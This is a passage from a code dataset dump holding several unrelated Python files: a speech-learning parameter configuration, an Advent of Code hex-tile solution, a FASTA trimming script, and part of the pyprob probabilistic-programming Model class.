= True\n\t\t\n\t\t#Train with logistic regression instead of ridge regression?\n\t\tself.logistic = False\n\n\t\t# Inferred and static variables\n\t\tself.n_channels = 50\n\t\tself.flow = None\n\t\n\t\t# ===============================================================================================================\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\n\tdef get_learn_params(self):\n\t\t\"\"\"\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t# Parameters that are used in 'learn' (and functions)\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t\"\"\"\n\t\t# Output-subfolder and verbosity: See __init__()\n\t\t\n\t\t# Learner, Targets; etc.\n\t\t\t# An integer (0 for instance) - Which of the speakers shall be the learner?\n\t\tself.learner = 0\n\t\t\t# From which group?\n\t\tself.sp_group_name = 'srangefm_2'\n\t\t\t#Target vowel for imitation (default: 'a') \"all\" = self.vowels\n\t\tself.targets = ['a','i','u']#\"all\"\n\t\t\t#Initial target (can change after 1 iteration, due to intrinsic motivation)\n\t\tself.target = \"a\"\n\t\t\t#vocal tract parameters to learn (other options: 'all' or 'flat')\n\t\t\t\t# Only the tongue (flat)?\n\t\t#self.pars_to_learn = ['TCX','TTX','TTY','TBX','TBY']\n\t\t\t\t# All except lips and tongue side elevations, jaw\n\t\tself.pars_to_learn = ['TCX','TTX','TTY','TBX','TBY','HX','HY','VS'] # left out: ,'JA','LD','LP' (jaw and lip parameters)\n\t\t\t\t# All. Be careful not to omit the brackets!\n\t\t#self.pars_to_learn = [\"all\"]\n\t\t\t#simulate flat tongue, i.e. set all TS to 0 again and again? This only kicks into action, if you're not learning the tongue side elevations too.\n\t\tself.flat_tongue = False\n\t\t\n\t\t\t\t# The ESN we're using:\n\t\t# --------------------------------------------------------------\n\t\t# Important. If the sequence of nodes in the ESN used here does not correspond to how ambient speech was produced, you will have to perform the ambient\n\t\t# speech setup again before executing learn. \n\t\t# \t\t(For example: ambient speech of 5 vowels is produced. 
But now we decide to use an ESN trained on only 3 vowels,\n\t\t# \t\t- 'learn' will be confused, because it assumes the number of vowels initialized in 'ambient speech setup' is also the number of ESN output nodes.\n\t\t# \t\tSolution: reinitialize with only 3 vowels (in ambient speech).)\n\t\t#self.ESN_path = '/data/output/hear/'+self.sp_group_name+'/worker_0reservoir1000_leakyTrue.flow'\n\t\tself.ESN_path = '/data/output/hear/'+self.sp_group_name+'/3vow_N1000_reg.flow' # Max Murakami's thesis ESN.\n\t\t#self.ESN_path = raw_input(\"Please enter the (relative) path to the reservoir (ESN) which is to be used in the babbling stage!:\\n\\t>\")\n\n\t\t\t# Special ESN sequence of nodes? If not, set False.\n\t\tself.ESN_sequence = ['a','i','u','null'] # For the orig. ESNs (Murakami)\n\t\t#self.ESN_sequence = False\n\n\t\t# Sampling.\n\t\t# --------------------------------------------------------------\n\t\t\t#resample invalid motor parameters?\n\t\t\t# Choose one of the resampling options. 'normal' simply resamples all parameters if one is below/above a boundary (slow!), 'penalty' simply sets\n\t\t\t# the relevant parameters to 0 or 1 if above 1 or below 0, and introduces a penalty to the fitness (to the reward). 'specific' only resamples\n\t\t\t# those parameters that went wrong, and keeps the others, also introducing a penalty. This is maybe the most complicated, but should be fast.\n\t\t\t# See 'learn functions' - if self.resample['normal']: etc. for more details.\n\t\tself.resample = 'soft_edge'#{'normal':False, 'penalty':False, 'specific':True}\n\n\t\t# Always save the most advanced speech sound of each category as a sound file in data?\n\t\t# If you do this, you won't need to set a realistic convergence threshold. It will simply learn and learn, until the user\n\t\t# interrupts. You can always check what the best learnt vowels are in data/output/learn/[speaker group]/peak/..\n\t\tself.save_peak = True\n\n\t\t# Reward computation and sigma\n\t\t# --------------------------------------------------------------\n\t\t\t#step-size = sigma (default=0.4) in the beginning.\n\t\tself.start_sigma = 0.4\n\t\t\t#keep sigma_0 constant? Of course, sigma will still change according to the change of fitness. But 'current_sigma' in the code is a value that the (constantly\n\t\t\t# changing) sigma will always go back to. (Go through 'learn_functions' looking for current_sigma and sigma, to see how they interact.)\n\t\tself.keep_sigma_constant = False\n\t\t\t#alpha for constraint penalty (How badly should steps over boundaries in the parameters be punished?)\n\t\tself.alpha = 0.4#1.\n\t\t\t#energy balance factor. Non-efficient motor configurations (e.g. extreme tongue positions) are punished when computing reward.\n\t\tself.energy_factor = 0#0.1\n\t\t\t#restart search after a bad solution from random learnt/nonlearnt parameters (see code)?\n\t\tself.random_restart = True\n\t\t\t# Reward is not enough. We must converge in order to finish. Turn this on?\n\t\tself.must_converge = True\n\t\t\t# Is the learner motivated by random success in producing something\n\t\t\t# like any vowel and then steering towards that one (intrinsic_motivation),\n\t\t\t# or do we have a specific target to learn?\n\t\t\t# Intrinsic motivation only makes sense if you're learning most parameters. 
That way,\n\t\t\t# the not-learnt parameters (which are always kept static) will not interfere when\n\t\t\t# we jump from one target to the next.\n\t\tself.intrinsic_motivation = True\n\n\t\t# Convergence Criteria.\n\t\t# --------------------------------------------------------------\n\t\t# threshold for convergence (reward threshold) - the confidence returned from the ESN (originally 0.5 for all vowels)\n\t\tself.convergence_thresholds = {'a':0.5,'e':0.5,'i':0.5,'o':0.5,'u':0.5}\n\t\t\t#maximal conditioning number (covariance matrix)\n\t\tself.conditioning_maximum = 1e14\n\t\t\t# Parameter or reward convergence range. This is the size of the parameter/reward window in which, if the last few generations stayed, the program will conclude\n\t\t\t# that we have converged (found a local optimum in the fitness landscape) and reset (see random_restart) and correct sigma (make it bigger).\n\t\tself.range_for_convergence = 0.15\n\t\t\t# The convergence interval is the number of datapoints that are checked for convergence in reward or parameters. This value is computed in the algorithm itself;\n\t\t\t# however, the user can set the interval here. (If automatic, simply put False.)\n\t\t\t# Must be above the size of one generation!\n\t\tself.user_convergence_interval = 7\n\t\t\t# Optional. (If you want to use the recommended amount of samples for each iteration, simply put False.)\n\t\t\t# If you set the population size, the convergence interval must also be set.\n\t\tself.population_size = 20\n\n\t\t\"\"\"\n\t\tEven this simple example may take a very long time to finish, or it may\n\t\tnever stop.\n\t\tThe most critical factor for this is the quality of the auditory learning.\n\t\tSo your most important task is to make sure the auditory system is trained\n\t\tproperly:\n\t\t- Make sure that every single ambient speech sample is placed in the\n\t\t correct folder. If it sounds like [a] for you, put it in data/a and\n\t\t so on. If it doesn't sound like any of the target vowels, put it into\n\t\t one of the null folders. All null folders are treated in the same way,\n\t\t so it doesn't exactly make a big difference where you put it.\n\t\t The idea behind the different null folders is this: If we generate\n\t\t speech samples in the vicinity of a given prototypical vowel, then\n\t\t null samples may show up that don't really sound like that vowel but\n\t\t show some similarity to it. So in a sense, they represent constraints\n\t\t of the acoustical properties of that vowel, which greatly helps the\n\t\t auditory system to learn a model of that vowel.\n\t\t In the ideal case, all null folders contain the same number of samples,\n\t\t which should be a third of what each vowel folder holds. The reason\n\t\t is that we'd like to train the auditory system in an unbiased fashion\n\t\t such that the trained auditory system shows no a priori classification\n\t\t preference for any class. Use these rules to achieve this:\n\t\t n_samples is a multiple of the number of vowels,\n\t\t n_training is a multiple of the number of vowels,\n\t\t each vowel folder contains at least n_samples samples,\n\t\t each null folder contains at least n_samples/3 samples.\n\t\t (For example, with the three vowels /a/, /i/ and /u/ and n_samples = 90,\n\t\t each vowel folder holds at least 90 samples and each of the three null\n\t\t folders at least 30, so the null class totals 90 as well.)\n\t\t An alternative is to bias auditory learning in favor of the null class.\n\t\t This will have the effect that the trained auditory system is more\n\t\t likely to classify a given sample as a null sample, so the speech\n\t\t sample needs to provide stronger evidence that it is one of the target\n\t\t vowels. 
So introducing such a training bias creates \"stricter\" auditory\n\t\t systems, which is viable.\n\t\t- Increase the number of ambient speech samples for auditory learning. The\n\t\t number of samples that we generated in this example is way too small for\n\t\t efficient learning. Raise that number by at least one order of magnitude\n\t\t to see reasonable learning progress.\n\t\tOther ways to improve/accelerate learning:\n\t\t- Make use of parallelization. Especially when you're moving to problems that\n\t\t involve more than one articulator, being able to crank out tens or hundreds\n\t\t of speech samples per babbling iteration is a huge advantage and makes\n\t\t these problems feasible in the first place.\n\t\t- Run statistics. Because the reservoir of the auditory system is based on\n\t\t random numbers, you can always end up with one that has trouble recognizing\n\t\t one or the other vowel, even if your training parameters are good. Train\n\t\t multiple auditory systems and pick one that performs well.\n\t\t- Lower the reward threshold during babbling. Setting the reward threshold\n\t\t to 0.5 is rather ad hoc. If you find that speech samples with 0.47 are\n\t\t consistently good enough imitations, don't hesitate to lower that threshold.\n\t\t This will make speech evaluation more lenient and the whole imitation\n\t\t process much faster.\n\t\t\"\"\"\n","sub_path":"control/get_params.py","file_name":"get_params.py","file_ext":"py","file_size_in_byte":21608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"49660738","text":"from day24input import *\ninputrows = inputString.split(\"\\n\")\n\ndef getNextTile(tile, data):\n    if data[0] == \"e\":\n        tile = (tile[0]+2, tile[1])\n        data = data[1:]\n    elif data[0] == \"s\" and data[1] == \"e\":\n        tile = (tile[0]+1, tile[1]+1)\n        data = data[2:]\n    elif data[0] == \"s\" and data[1] == \"w\":\n        tile = (tile[0]-1, tile[1]+1)\n        data = data[2:]\n    elif data[0] == \"w\":\n        tile = (tile[0]-2, tile[1])\n        data = data[1:]\n    elif data[0] == \"n\" and data[1] == \"w\":\n        tile = (tile[0]-1, tile[1]-1)\n        data = data[2:]\n    elif data[0] == \"n\" and data[1] == \"e\":\n        tile = (tile[0]+1, tile[1]-1)\n        data = data[2:]\n    return [tile, data]\n\ndef part1():\n    state = {}\n    for inputrow in inputrows:\n        row = list(inputrow)\n        tile = (0,0)\n        while len(row) != 0:\n            result = getNextTile(tile, row)\n            tile = result[0]\n            row = result[1]\n        if tile not in state:\n            state[tile] = \"Black\"\n        else:\n            state[tile] = \"Black\" if state[tile] == \"White\" else \"White\"\n\n    count = 0\n    for color in state.values():\n        if color == \"Black\":\n            count += 1\n    return [state, count]\n\nresult = part1()\ncount = result[1]\nprint(count)\n\n# Part 2\n\n# Keeping only black tiles to avoid extending state\nblackTiles = set()\nstate = result[0]\nfor tile, value in state.items():\n    if value == \"Black\":\n        blackTiles.add(tile)\n\ndef getNeighbours(tile):\n    Etile = (tile[0]+2, tile[1])\n    SEtile = (tile[0]+1, tile[1]+1)\n    SWtile = (tile[0]-1, tile[1]+1)\n    Wtile = (tile[0]-2, tile[1])\n    NWtile = (tile[0]-1, tile[1]-1)\n    NEtile = (tile[0]+1, tile[1]-1)\n    return [Etile, SEtile, SWtile, Wtile, NWtile, NEtile]\n\n
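# The tiles live on a hex grid encoded in 'doubled' coordinates: a step east\n# is x+2, and each diagonal step changes x by 1 and y by 1, so x+y stays even\n# for every reachable tile and distinct tiles never collide.\n# Quick sanity check of the scheme (an illustrative addition, not part of the\n# original solution): one step east followed by one step west returns home.\n_tile, _ = getNextTile((0, 0), ['e'])\n_tile, _ = getNextTile(_tile, ['w'])\nassert _tile == (0, 0)\n\n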
#One day iteration\ndef run(blackTiles):\n    nrOfNeighbours = {} # key = tile, value = number of current black neighbours of the tile\n\n    for tile in blackTiles: # Initiate black tiles\n        nrOfNeighbours[tile] = 0\n\n    # The only relevant tiles are the black ones and their neighbours\n    for tile in blackTiles:\n        neighbours = getNeighbours(tile)\n        for neighbour in neighbours:\n            if neighbour not in nrOfNeighbours:\n                nrOfNeighbours[neighbour] = 1 # (neighbour of current tile)\n            else:\n                nrOfNeighbours[neighbour] += 1\n\n    newBlackTiles = set()\n    for tile, nr in nrOfNeighbours.items():\n        # Parentheses matter here: a black tile stays black with 1 or 2 black\n        # neighbours; a white tile becomes black with exactly 2.\n        if tile in blackTiles and (nr == 1 or nr == 2):\n            newBlackTiles.add(tile) # Stay black\n        elif tile not in blackTiles and nr == 2:\n            newBlackTiles.add(tile) # Become black\n\n    return newBlackTiles\n\nfor _ in range(0,100):\n    blackTiles = run(blackTiles)\n\nprint(len(blackTiles))\n","sub_path":"day24.py","file_name":"day24.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"309534492","text":"import sys\nfrom Bio import SeqIO\n\nseq_file = sys.argv[1]\ntit_file = open(sys.argv[2], 'r')\noutput_file = open(sys.argv[3], 'w')\nseq_gen = SeqIO.parse(seq_file, 'fasta')\n\nseq = seq_gen.__next__()\nfor tit in tit_file.readlines():\n    while seq.id not in tit:\n        try:\n            seq = seq_gen.__next__()\n        except StopIteration:  # sequence generator exhausted without a match\n            print(tit)\n            sys.exit(0)\n\n    frame_shift = int(tit[tit.find('F')+1:tit.find('F')+2])\n    start_loc = int(tit[tit.find('L')+1:tit.find('R')])\n    end_loc = int(tit[tit.find('R')+1:-1])\n    fna_seq = str(seq.seq)[frame_shift + start_loc * 3 : frame_shift + end_loc * 3]\n\n    output_file.writelines(tit)\n    line_Number = int(len(fna_seq) / 60)\n    for line in range(line_Number):\n        output_file.writelines(fna_seq[line * 60:line * 60 + 60]+'\\n')\n    output_file.writelines(fna_seq[line_Number*60:]+'\\n')\n","sub_path":"Trim_fna.py","file_name":"Trim_fna.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"79544130","text":"import torch\nimport torch.nn as nn\nimport time\nimport sys\nimport os\nimport uuid\nfrom threading import Thread\nfrom termcolor import colored\nimport math\nimport random\nimport tarfile\nimport tempfile\nimport shutil\n\nfrom .distributions import Empirical\nfrom . 
import state, util, __version__, TraceMode, InferenceEngine, InferenceNetwork, PriorInflation, Optimizer, TrainingObservation\nfrom .nn import ObserveEmbedding, SampleEmbedding, Batch, InferenceNetworkSimple, InferenceNetworkLSTM\nfrom .remote import ModelServer\nfrom .analytics import save_report\n\n\nclass Model(nn.Module):\n def __init__(self, name='Unnamed pyprob model'):\n super().__init__()\n self.name = name\n self._inference_network = None\n self._trace_cache_path = None\n self._trace_cache = []\n self._trace_cache_discarded_file_names = []\n\n def forward(self):\n raise NotImplementedError()\n\n def _trace_generator(self, trace_mode=TraceMode.PRIOR, prior_inflation=PriorInflation.DISABLED, inference_engine=InferenceEngine.IMPORTANCE_SAMPLING, inference_network=None, metropolis_hastings_trace=None, observation_importance_exponent=1., *args, **kwargs):\n while True:\n if inference_engine == InferenceEngine.IMPORTANCE_SAMPLING_WITH_INFERENCE_NETWORK:\n self._inference_network.new_trace(util.pack_observes_to_variable(kwargs['observation']).unsqueeze(0))\n state.begin_trace(self.forward, trace_mode, prior_inflation, inference_engine, inference_network, metropolis_hastings_trace, observation_importance_exponent)\n result = self.forward(*args, **kwargs)\n trace = state.end_trace(result)\n yield trace\n\n def _trace_result_generator(self, prior_inflation=PriorInflation.DISABLED, observation_importance_exponent=1., *args, **kwargs):\n while True:\n state.begin_trace(None, trace_mode=TraceMode.NONE, prior_inflation=prior_inflation, observation_importance_exponent=observation_importance_exponent)\n result = self.forward(*args, **kwargs)\n state.end_trace(None)\n yield result\n\n def _traces(self, num_traces=10, trace_mode=TraceMode.PRIOR, prior_inflation=PriorInflation.DISABLED, inference_engine=InferenceEngine.IMPORTANCE_SAMPLING, inference_network=None, map_func=None, observation_importance_exponent=1., *args, **kwargs):\n generator = self._trace_generator(trace_mode=trace_mode, prior_inflation=prior_inflation, inference_engine=inference_engine, inference_network=inference_network, observation_importance_exponent=observation_importance_exponent, *args, **kwargs)\n ret = []\n time_start = time.time()\n if ((trace_mode != TraceMode.PRIOR) and (util.verbosity > 1)) or (util.verbosity > 2):\n len_str_num_traces = len(str(num_traces))\n print('Time spent | Time remain.| Progress | {} | Traces/sec'.format('Trace'.ljust(len_str_num_traces * 2 + 1)))\n prev_duration = 0\n for i in range(num_traces):\n if ((trace_mode != TraceMode.PRIOR) and (util.verbosity > 1)) or (util.verbosity > 2):\n duration = time.time() - time_start\n if (duration - prev_duration > util._print_refresh_rate) or (i == num_traces - 1):\n prev_duration = duration\n traces_per_second = (i + 1) / duration\n print('{} | {} | {} | {}/{} | {:,.2f} '.format(util.days_hours_mins_secs_str(duration), util.days_hours_mins_secs_str((num_traces - i) / traces_per_second), util.progress_bar(i+1, num_traces), str(i+1).rjust(len_str_num_traces), num_traces, traces_per_second), end='\\r')\n sys.stdout.flush()\n trace = next(generator)\n if map_func is not None:\n ret.append(map_func(trace))\n else:\n ret.append(trace)\n if ((trace_mode != TraceMode.PRIOR) and (util.verbosity > 1)) or (util.verbosity > 2):\n print()\n return ret\n\n def prior_sample(self, prior_inflation=PriorInflation.DISABLED, *args, **kwargs):\n generator = self._trace_result_generator(prior_inflation, *args, **kwargs)\n return next(generator)\n\n def 
prior_distribution(self, num_traces=1000, prior_inflation=PriorInflation.DISABLED, *args, **kwargs):\n generator = self._trace_result_generator(prior_inflation, *args, **kwargs)\n ret = []\n time_start = time.time()\n if util.verbosity > 1:\n len_str_num_traces = len(str(num_traces))\n print('Time spent | Time remain.| Progress | {} | Traces/sec'.format('Trace'.ljust(len_str_num_traces * 2 + 1)))\n prev_duration = 0\n for i in range(num_traces):\n if util.verbosity > 1:\n duration = time.time() - time_start\n if (duration - prev_duration > util._print_refresh_rate) or (i == num_traces - 1):\n prev_duration = duration\n traces_per_second = (i + 1) / duration\n print('{} | {} | {} | {}/{} | {:,.2f} '.format(util.days_hours_mins_secs_str(duration), util.days_hours_mins_secs_str((num_traces - i) / traces_per_second), util.progress_bar(i+1, num_traces), str(i+1).rjust(len_str_num_traces), num_traces, traces_per_second), end='\\r')\n sys.stdout.flush()\n ret.append(next(generator))\n if util.verbosity > 1:\n print()\n return Empirical(ret, name='Prior, num_traces={:,}'.format(num_traces))\n\n def posterior_distribution(self, *args, **kwargs):\n return self.posterior_traces(*args, **kwargs).map(lambda x: x.result)\n\n def posterior_traces(self, num_traces=1000, inference_engine=InferenceEngine.IMPORTANCE_SAMPLING, burn_in=None, initial_trace=None, observation_importance_exponent=1., *args, **kwargs):\n if (inference_engine == InferenceEngine.IMPORTANCE_SAMPLING_WITH_INFERENCE_NETWORK) and (self._inference_network is None):\n raise RuntimeError('Cannot run inference with inference network because there is none available. Use learn_inference_network first.')\n if burn_in is not None:\n if burn_in >= num_traces:\n raise ValueError('burn_in must be less than num_traces')\n else:\n # Default burn_in\n burn_in = int(min(num_traces / 10, 1000))\n\n if inference_engine == InferenceEngine.IMPORTANCE_SAMPLING:\n traces = self._traces(num_traces=num_traces, trace_mode=TraceMode.POSTERIOR, inference_engine=inference_engine, inference_network=None, observation_importance_exponent=observation_importance_exponent, *args, **kwargs)\n log_weights = [trace.log_importance_weight for trace in traces]\n name = 'Posterior, importance sampling (with proposal = prior), num_traces={:,}'.format(num_traces)\n elif inference_engine == InferenceEngine.IMPORTANCE_SAMPLING_WITH_INFERENCE_NETWORK:\n self._inference_network.eval()\n traces = self._traces(num_traces=num_traces, trace_mode=TraceMode.POSTERIOR, inference_engine=inference_engine, inference_network=self._inference_network, observation_importance_exponent=observation_importance_exponent, *args, **kwargs)\n log_weights = [trace.log_importance_weight for trace in traces]\n name = 'Posterior, importance sampling (with learned proposal, training_traces={:,}), num_traces={:,}'.format(self._inference_network._total_train_traces, num_traces)\n else: # inference_engine == InferenceEngine.LIGHTWEIGHT_METROPOLIS_HASTINGS or inference_engine == InferenceEngine.RANDOM_WALK_METROPOLIS_HASTINGS\n traces = []\n if initial_trace is None:\n current_trace = next(self._trace_generator(trace_mode=TraceMode.POSTERIOR, inference_engine=inference_engine, observation_importance_exponent=observation_importance_exponent, *args, **kwargs))\n else:\n current_trace = initial_trace\n\n time_start = time.time()\n traces_accepted = 0\n samples_reused = 0\n samples_all = 0\n if util.verbosity > 1:\n len_str_num_traces = len(str(num_traces))\n print('Time spent | Time remain.| Progress | {} | 
Accepted|Smp reuse| Traces/sec'.format('Trace'.ljust(len_str_num_traces * 2 + 1)))\n prev_duration = 0\n for i in range(num_traces):\n if util.verbosity > 1:\n duration = time.time() - time_start\n if (duration - prev_duration > util._print_refresh_rate) or (i == num_traces - 1):\n prev_duration = duration\n traces_per_second = (i + 1) / duration\n print('{} | {} | {} | {}/{} | {} | {} | {:,.2f} '.format(util.days_hours_mins_secs_str(duration), util.days_hours_mins_secs_str((num_traces - i) / traces_per_second), util.progress_bar(i+1, num_traces), str(i+1).rjust(len_str_num_traces), num_traces, '{:,.2f}%'.format(100 * (traces_accepted / (i + 1))).rjust(7), '{:,.2f}%'.format(100 * samples_reused / max(1, samples_all)).rjust(7), traces_per_second), end='\\r')\n sys.stdout.flush()\n candidate_trace = next(self._trace_generator(trace_mode=TraceMode.POSTERIOR, inference_engine=inference_engine, metropolis_hastings_trace=current_trace, observation_importance_exponent=observation_importance_exponent, *args, **kwargs))\n log_acceptance_ratio = math.log(current_trace.length) - math.log(candidate_trace.length) + candidate_trace.log_prob_observed - current_trace.log_prob_observed\n for sample in candidate_trace.samples:\n if sample.reused:\n log_acceptance_ratio += util.safe_torch_sum(sample.log_prob)\n log_acceptance_ratio -= util.safe_torch_sum(current_trace._samples_all_dict_address[sample.address].log_prob)\n samples_reused += 1\n samples_all += candidate_trace.length\n\n if state._metropolis_hastings_site_transition_log_prob is None:\n print(colored('Warning: trace did not hit the Metropolis Hastings site, ensure that the model is deterministic except pyprob.sample calls', 'red', attrs=['bold']))\n else:\n log_acceptance_ratio += util.safe_torch_sum(state._metropolis_hastings_site_transition_log_prob)\n\n # print(log_acceptance_ratio)\n if math.log(random.random()) < float(log_acceptance_ratio):\n traces_accepted += 1\n current_trace = candidate_trace\n traces.append(current_trace)\n if util.verbosity > 1:\n print()\n if burn_in is not None:\n traces = traces[burn_in:]\n log_weights = None\n name = 'Posterior, {} Metropolis Hastings, num_traces={:,}, burn_in={:,}, accepted={:,.2f}%, sample_reuse={:,.2f}%'.format('lightweight' if inference_engine == InferenceEngine.LIGHTWEIGHT_METROPOLIS_HASTINGS else 'random-walk', num_traces, burn_in, 100 * (traces_accepted / num_traces), 100 * samples_reused / samples_all)\n\n # if inference_engine == InferenceEngine.IMPORTANCE_SAMPLING or inference_engine == InferenceEngine.IMPORTANCE_SAMPLING_WITH_INFERENCE_NETWORK:\n # ret.name += ' (effective sample size: {:,.2f})'.format(float(ret.effective_sample_size))\n return Empirical(traces, log_weights, name=name)\n\n def learn_inference_network(self, inference_network=InferenceNetwork.LSTM, training_observation=TrainingObservation.OBSERVE_DIST_SAMPLE, prior_inflation=PriorInflation.DISABLED, observe_embedding=ObserveEmbedding.FULLY_CONNECTED, observe_reshape=None, observe_embedding_dim=128, sample_embedding=SampleEmbedding.FULLY_CONNECTED, lstm_dim=128, lstm_depth=2, sample_embedding_dim=16, address_embedding_dim=128, batch_size=64, valid_size=256, valid_interval=2048, optimizer_type=Optimizer.ADAM, learning_rate=0.0001, momentum=0.9, weight_decay=1e-5, num_traces=-1, use_trace_cache=False, auto_save=False, auto_save_file_name='pyprob_inference_network', *args, **kwargs):\n if use_trace_cache and self._trace_cache_path is None:\n print('Warning: There is no trace cache assigned, training with online trace 
generation.')\n use_trace_cache = False\n\n if use_trace_cache:\n print('Using trace cache to train...')\n\n def new_batch_func(size=batch_size, discard_source=False):\n if discard_source:\n self._trace_cache = []\n\n while len(self._trace_cache) < size:\n current_files = self._trace_cache_current_files()\n if len(current_files) == 0:\n cache_is_empty = True\n cache_was_empty = False\n while cache_is_empty:\n current_files = self._trace_cache_current_files()\n num_files = len(current_files)\n if num_files > 0:\n cache_is_empty = False\n if cache_was_empty:\n print('Resuming, new data appeared in trace cache (currently with {} files) at {}'.format(num_files, self._trace_cache_path))\n else:\n if not cache_was_empty:\n print('Waiting for new data, empty (or fully discarded) trace cache at {}'.format(self._trace_cache_path))\n cache_was_empty = True\n time.sleep(0.5)\n\n current_file = random.choice(current_files)\n if discard_source:\n self._trace_cache_discarded_file_names.append(current_file)\n new_traces = self._load_traces(current_file)\n if len(new_traces) == 0: # When empty or corrupt file is read\n self._trace_cache_discarded_file_names.append(current_file)\n else:\n random.shuffle(new_traces)\n self._trace_cache += new_traces\n\n traces = self._trace_cache[0:size]\n self._trace_cache[0:size] = []\n return Batch(traces)\n else:\n def new_batch_func(size=batch_size, discard_source=False):\n traces = self._traces(size, trace_mode=TraceMode.PRIOR, prior_inflation=prior_inflation, *args, **kwargs)\n return Batch(traces)\n\n if self._inference_network is None:\n print('Creating new inference network...')\n valid_batch = new_batch_func(valid_size, discard_source=True)\n if inference_network == InferenceNetwork.SIMPLE:\n self._inference_network = InferenceNetworkSimple(model_name=self.name, observe_embedding=observe_embedding, observe_reshape=observe_reshape, observe_embedding_dim=observe_embedding_dim, valid_batch=valid_batch)\n else: # inference_network == InferenceNetwork.LSTM:\n self._inference_network = InferenceNetworkLSTM(model_name=self.name, lstm_dim=lstm_dim, lstm_depth=lstm_depth, observe_embedding=observe_embedding, observe_reshape=observe_reshape, observe_embedding_dim=observe_embedding_dim, sample_embedding=sample_embedding, sample_embedding_dim=sample_embedding_dim, address_embedding_dim=address_embedding_dim, valid_batch=valid_batch)\n\n self._inference_network.polymorph()\n else:\n print('Continuing to train existing inference network...')\n\n self._inference_network.train()\n self._inference_network.optimize(new_batch_func, training_observation, optimizer_type, num_traces, learning_rate, momentum, weight_decay, valid_interval, auto_save, auto_save_file_name)\n\n def save_inference_network(self, file_name):\n if self._inference_network is None:\n raise RuntimeError('The model has no trained inference network.')\n self._inference_network._save(file_name)\n\n def load_inference_network(self, file_name):\n self._inference_network = InferenceNetworkSimple._load(file_name, util._cuda_enabled, util._cuda_device)\n\n def trace_length_mean(self, num_traces=1000, *args, **kwargs):\n trace_lengths = self._traces(num_traces, trace_mode=TraceMode.PRIOR, map_func=lambda trace: trace.length, *args, **kwargs)\n trace_length_dist = Empirical(trace_lengths)\n return trace_length_dist.mean\n\n def trace_length_stddev(self, num_traces=1000, *args, **kwargs):\n trace_lengths = self._traces(num_traces, trace_mode=TraceMode.PRIOR, map_func=lambda trace: trace.length, *args, **kwargs)\n 
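# Build an Empirical distribution over the sampled trace lengths so we can reuse its stddev computation.\n        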
trace_length_dist = Empirical(trace_lengths)\n return trace_length_dist.stddev\n\n def trace_length_min(self, num_traces=1000, *args, **kwargs):\n trace_lengths = self._traces(num_traces, trace_mode=TraceMode.PRIOR, map_func=lambda trace: trace.length, *args, **kwargs)\n trace_length_dist = Empirical(trace_lengths)\n return trace_length_dist.min\n\n def trace_length_max(self, num_traces=1000, *args, **kwargs):\n trace_lengths = self._traces(num_traces, trace_mode=TraceMode.PRIOR, map_func=lambda trace: trace.length, *args, **kwargs)\n trace_length_dist = Empirical(trace_lengths)\n return trace_length_dist.max\n\n def save_trace_cache(self, trace_cache_path, files=16, traces_per_file=512, prior_inflation=PriorInflation.DISABLED, *args, **kwargs):\n f = 0\n done = False\n while not done:\n traces = self._traces(traces_per_file, trace_mode=TraceMode.PRIOR, prior_inflation=prior_inflation, *args, **kwargs)\n file_name = os.path.join(trace_cache_path, 'pyprob_traces_{}_{}'.format(traces_per_file, str(uuid.uuid4())))\n self._save_traces(traces, file_name)\n f += 1\n if (files != -1) and (f >= files):\n done = True\n\n def use_trace_cache(self, trace_cache_path):\n self._trace_cache_path = trace_cache_path\n num_files = len(self._trace_cache_current_files())\n print('Monitoring trace cache (currently with {} files) at {}'.format(num_files, trace_cache_path))\n\n def _trace_cache_current_files(self):\n files = [name for name in os.listdir(self._trace_cache_path)]\n files = list(map(lambda f: os.path.join(self._trace_cache_path, f), files))\n for discarded_file_name in self._trace_cache_discarded_file_names:\n if discarded_file_name in files:\n files.remove(discarded_file_name)\n return files\n\n def _save_traces(self, traces, file_name):\n data = {}\n data['traces'] = traces\n data['length'] = len(traces)\n data['model_name'] = self.name\n data['pyprob_version'] = __version__\n data['torch_version'] = torch.__version__\n\n def thread_save():\n tmp_dir = tempfile.mkdtemp(suffix=str(uuid.uuid4()))\n tmp_file_name = os.path.join(tmp_dir, 'pyprob_traces')\n torch.save(data, tmp_file_name)\n tar = tarfile.open(file_name, 'w:gz', compresslevel=2)\n tar.add(tmp_file_name, arcname='pyprob_traces')\n tar.close()\n shutil.rmtree(tmp_dir)\n t = Thread(target=thread_save)\n t.start()\n t.join()\n\n def _load_traces(self, file_name):\n try:\n tar = tarfile.open(file_name, 'r:gz')\n tmp_dir = tempfile.mkdtemp(suffix=str(uuid.uuid4()))\n tmp_file = os.path.join(tmp_dir, 'pyprob_traces')\n tar.extract('pyprob_traces', tmp_dir)\n tar.close()\n if util._cuda_enabled:\n data = torch.load(tmp_file)\n else:\n data = torch.load(tmp_file, map_location=lambda storage, loc: storage)\n shutil.rmtree(tmp_dir)\n except:\n print('Warning: cannot load traces from file, file potentially corrupt: {}'.format(file_name))\n return []\n\n # print('Loading trace cache of length {}'.format(data['length']))\n if data['model_name'] != self.name:\n print(colored('Warning: different model names (loaded traces: {}, current model: {})'.format(data['model_name'], self.name), 'red', attrs=['bold']))\n if data['pyprob_version'] != __version__:\n print(colored('Warning: different pyprob versions (loaded traces: {}, current system: {})'.format(data['pyprob_version'], __version__), 'red', attrs=['bold']))\n if data['torch_version'] != torch.__version__:\n print(colored('Warning: different PyTorch versions (loaded traces: {}, current system: {})'.format(data['torch_version'], torch.__version__), 'red', attrs=['bold']))\n\n traces = 
